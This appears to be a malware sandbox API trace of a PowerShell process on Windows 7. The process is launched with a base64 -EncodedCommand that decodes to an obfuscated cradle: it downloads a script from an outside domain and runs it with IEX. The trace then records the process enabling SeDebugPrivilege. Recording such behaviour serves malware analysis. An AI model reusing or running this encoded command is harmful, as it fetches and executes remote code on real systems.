	[0393.995] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.995] SetErrorMode (uMode=0x1) returned 0x1
	[0393.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0393.995] SetErrorMode (uMode=0x1) returned 0x1
	[0393.995] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.996] SetErrorMode (uMode=0x1) returned 0x1
	[0393.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0393.996] SetErrorMode (uMode=0x1) returned 0x1
	[0393.996] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.996] SetErrorMode (uMode=0x1) returned 0x1
	[0393.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0393.997] SetErrorMode (uMode=0x1) returned 0x1
	[0393.997] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1b6f0d10
	[0393.998] FindNextFileW (in: hFindFile=0x1b6f0d10, lpFindFileData=0x1c7fdcf0 | out: lpFindFileData=0x1c7fdcf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0393.998] FindClose (in: hFindFile=0x1b6f0d10 | out: hFindFile=0x1b6f0d10) returned 1
	[0393.998] SetErrorMode (uMode=0x1) returned 0x1
	[0394.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7fde00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0394.337] SetErrorMode (uMode=0x1) returned 0x1
	[0394.337] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c7fe010 | out: lpFileInformation=0x1c7fe010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0394.337] SetErrorMode (uMode=0x1) returned 0x1
	[0394.338] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0394.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0394.338] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0394.339] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0394.339] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0394.339] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0394.342] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0394.342] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0394.342] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0394.350] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0394.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0394.350] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0394.362] CoTaskMemAlloc (cb=0x3b) returned 0x1b72e020
	[0394.362] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7fe1f8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7fe1f8) returned 0x4550
	[0394.363] CoTaskMemFree (pv=0x1b72e020) 
	[0394.365] GetConsoleWindow () returned 0x30298
	[0394.731] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0394.731] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0394.731] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0394.732] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0394.732] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0394.732] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0394.738] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0394.738] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0394.738] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0394.740] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c7fe240 | out: pNumArgs=0x1c7fe240) returned 0x1b711e90*=""
	[0394.742] lstrlenW (lpString="-EncodedCommand") returned 15
	[0394.743] CoTaskMemAlloc (cb=0x22) returned 0x1b724060
	[0394.743] RtlMoveMemory (in: Destination=0x1b724060, Source=0x1b711eb2, Length=0x20 | out: Destination=0x1b724060) 
	[0394.743] CoTaskMemFree (pv=0x1b724060) 
	[0394.743] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0394.743] CoTaskMemAlloc (cb=0x2f4) returned 0x1b7354a0
	[0394.743] RtlMoveMemory (in: Destination=0x1b7354a0, Source=0x1b711ed2, Length=0x2f2 | out: Destination=0x1b7354a0) 
	[0394.743] CoTaskMemFree (pv=0x1b7354a0) 
	[0394.744] LocalFree (hMem=0x1b711e90) returned 0x0
	[0394.744] CoTaskMemAlloc (cb=0x804) returned 0x1b7354a0
	[0394.744] GetConsoleTitleW (in: lpConsoleTitle=0x1b7354a0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0394.745] CoTaskMemFree (pv=0x1b7354a0) 
	[0394.754] CoTaskMemAlloc (cb=0x38e) returned 0x1b7354a0
	[0394.754] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c7fe1a0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2e67a70 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2e67a70*(hProcess=0x368, hThread=0x364, dwProcessId=0xc10, dwThreadId=0x1110)) returned 1
	[0394.757] CoTaskMemFree (pv=0x1b7354a0) 
	[0394.758] CloseHandle (hObject=0x364) returned 1
	[0394.758] CoTaskMemAlloc (cb=0x3b) returned 0x1b72e020
	[0394.758] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7fe248, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7fe248) returned 0x4550
	[0394.759] CoTaskMemFree (pv=0x1b72e020) 
	[0394.761] GetCurrentProcess () returned 0xffffffffffffffff
	[0394.761] GetCurrentProcess () returned 0xffffffffffffffff
	[0394.762] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x368, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7fe328, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7fe328*=0x364) returned 1

Process:
	id = "24"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1fe59000"
	os_pid = "0xab0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 128
	os_tid = 0xab4

	[0437.734] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0438.877] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0438.877] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0438.877] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0438.877] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0442.221] GetVersionExW (in: lpVersionInformation=0x24dbc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24dbc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0442.223] GetVersionExW (in: lpVersionInformation=0x24dbc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24dbc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0442.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0442.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0442.828] GetVersionExW (in: lpVersionInformation=0x24d930*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24d930*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0442.828] SetErrorMode (uMode=0x1) returned 0x1
	[0442.829] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24da90 | out: lpFileInformation=0x24da90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0442.830] SetErrorMode (uMode=0x1) returned 0x1
	[0442.834] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24dd00 | out: lpdwHandle=0x24dd00) returned 0x94c
	[0442.836] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cf72d8 | out: lpData=0x2cf72d8) returned 1
	[0442.838] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dc78, puLen=0x24dc70 | out: lplpBuffer=0x24dc78*=0x2cf7374, puLen=0x24dc70) returned 1
	[0442.841] lstrlenW (lpString="䅁") returned 1
	[0442.850] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24dbe8, puLen=0x24dbe0 | out: lplpBuffer=0x24dbe8*=0x2cf7450, puLen=0x24dbe0) returned 1
	[0442.850] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0442.852] CoTaskMemAlloc (cb=0x2e) returned 0x464830
	[0442.852] lstrcpyW (in: lpString1=0x464830, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0442.853] CoTaskMemFree (pv=0x464830) 
	[0442.853] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24dbe8, puLen=0x24dbe0 | out: lplpBuffer=0x24dbe8*=0x2cf74a4, puLen=0x24dbe0) returned 1
	[0442.853] lstrlenW (lpString="System.Management.Automation") returned 28
	[0442.854] CoTaskMemAlloc (cb=0x3c) returned 0x41f2c0
	[0442.854] lstrcpyW (in: lpString1=0x41f2c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0442.854] CoTaskMemFree (pv=0x41f2c0) 
	[0442.854] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24dbe8, puLen=0x24dbe0 | out: lplpBuffer=0x24dbe8*=0x2cf7500, puLen=0x24dbe0) returned 1
	[0442.854] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0442.854] CoTaskMemAlloc (cb=0x20) returned 0x45b930
	[0442.854] lstrcpyW (in: lpString1=0x45b930, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0442.854] CoTaskMemFree (pv=0x45b930) 
	[0442.854] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24dbe8, puLen=0x24dbe0 | out: lplpBuffer=0x24dbe8*=0x2cf7540, puLen=0x24dbe0) returned 1
	[0442.854] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0442.854] CoTaskMemAlloc (cb=0x44) returned 0x41f2c0
	[0442.854] lstrcpyW (in: lpString1=0x41f2c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0442.854] CoTaskMemFree (pv=0x41f2c0) 
	[0442.854] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24dbe8, puLen=0x24dbe0 | out: lplpBuffer=0x24dbe8*=0x2cf75a8, puLen=0x24dbe0) returned 1
	[0442.854] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0442.854] CoTaskMemAlloc (cb=0x76) returned 0x4031a0
	[0442.854] lstrcpyW (in: lpString1=0x4031a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0442.854] CoTaskMemFree (pv=0x4031a0) 
	[0442.854] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24dbe8, puLen=0x24dbe0 | out: lplpBuffer=0x24dbe8*=0x2cf7644, puLen=0x24dbe0) returned 1
	[0442.854] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0442.854] CoTaskMemAlloc (cb=0x44) returned 0x41f2c0
	[0442.854] lstrcpyW (in: lpString1=0x41f2c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0442.854] CoTaskMemFree (pv=0x41f2c0) 
	[0442.854] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24dbe8, puLen=0x24dbe0 | out: lplpBuffer=0x24dbe8*=0x2cf76a8, puLen=0x24dbe0) returned 1
	[0442.854] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0442.854] CoTaskMemAlloc (cb=0x58) returned 0x3b6f20
	[0442.854] lstrcpyW (in: lpString1=0x3b6f20, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0442.854] CoTaskMemFree (pv=0x3b6f20) 
	[0442.854] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24dbe8, puLen=0x24dbe0 | out: lplpBuffer=0x24dbe8*=0x2cf7724, puLen=0x24dbe0) returned 1
	[0442.854] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0442.855] CoTaskMemAlloc (cb=0x20) returned 0x45b930
	[0442.855] lstrcpyW (in: lpString1=0x45b930, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0442.855] CoTaskMemFree (pv=0x45b930) 
	[0442.855] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24dbe8, puLen=0x24dbe0 | out: lplpBuffer=0x24dbe8*=0x2cf73cc, puLen=0x24dbe0) returned 1
	[0442.855] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0442.855] CoTaskMemAlloc (cb=0x66) returned 0x3dc600
	[0442.855] lstrcpyW (in: lpString1=0x3dc600, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0442.855] CoTaskMemFree (pv=0x3dc600) 
	[0442.855] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24dbe8, puLen=0x24dbe0 | out: lplpBuffer=0x24dbe8*=0x0, puLen=0x24dbe0) returned 0
	[0442.855] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24dbe8, puLen=0x24dbe0 | out: lplpBuffer=0x24dbe8*=0x0, puLen=0x24dbe0) returned 0
	[0442.855] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24dbe8, puLen=0x24dbe0 | out: lplpBuffer=0x24dbe8*=0x0, puLen=0x24dbe0) returned 0
	[0442.855] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dbb8, puLen=0x24dbb0 | out: lplpBuffer=0x24dbb8*=0x2cf7374, puLen=0x24dbb0) returned 1
	[0443.117] CoTaskMemAlloc (cb=0x204) returned 0x41caa0
	[0443.117] VerLanguageNameW (in: wLang=0x0, szLang=0x41caa0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0443.119] CoTaskMemFree (pv=0x41caa0) 
	[0443.119] VerQueryValueW (in: pBlock=0x2cf72d8, lpSubBlock="\\", lplpBuffer=0x24dc08, puLen=0x24dc00 | out: lplpBuffer=0x24dc08*=0x2cf7300, puLen=0x24dc00) returned 1
	[0443.125] GetCurrentProcessId () returned 0xab0
	[0443.140] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x24cb30 | out: lpLuid=0x24cb30*(LowPart=0x14, HighPart=0)) returned 1
	[0443.143] GetCurrentProcess () returned 0xffffffffffffffff
	[0443.144] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x24cb50 | out: TokenHandle=0x24cb50*=0x2d4) returned 1
	[0443.145] AdjustTokenPrivileges (in: TokenHandle=0x2d4, DisableAllPrivileges=0, NewState=0x2cfab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0443.146] CloseHandle (hObject=0x2d4) returned 1
